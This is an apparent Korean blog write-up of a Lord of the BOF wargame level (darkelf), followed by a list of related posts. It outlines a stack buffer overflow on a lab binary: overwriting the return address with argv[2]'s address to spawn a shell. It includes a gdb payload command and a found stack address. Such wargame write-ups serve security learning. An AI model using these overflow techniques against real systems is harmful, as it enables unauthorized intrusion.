vi darkelf.c
argv[2]를 사용하여 푸는 5,6번과 차이점은 단지 argv[1]의 길이를 확인하여 48이 넘으면 종료시키므로 RET에 접근이 가능하다.
strcpy함수 전까지 브레이크포인트
계획) A로 44byte채우고 argv[2]의 주소를 RET에 채우고 쉘 실행
r `python –c ‘print“\xbf”*48’` `python –c ‘print“A”*100’`을 실행시켜 argv[2]의 주소를 찾자.
argv[2]의 주소 : 0xbffffc13
'LOB' 카테고리의 다른 글
| LOB 8번(orege → troll) (0) | 2016.10.04 |
|---|---|
| LOB 7번(darkelf → orge) (0) | 2016.10.04 |
| LOB 5번 (orc → wolfman) (0) | 2016.07.13 |
| LOB 4번 (goblin → orc) (0) | 2016.07.13 |
| LOB 3번 (cobolt → goblin) (0) | 2016.07.13 |
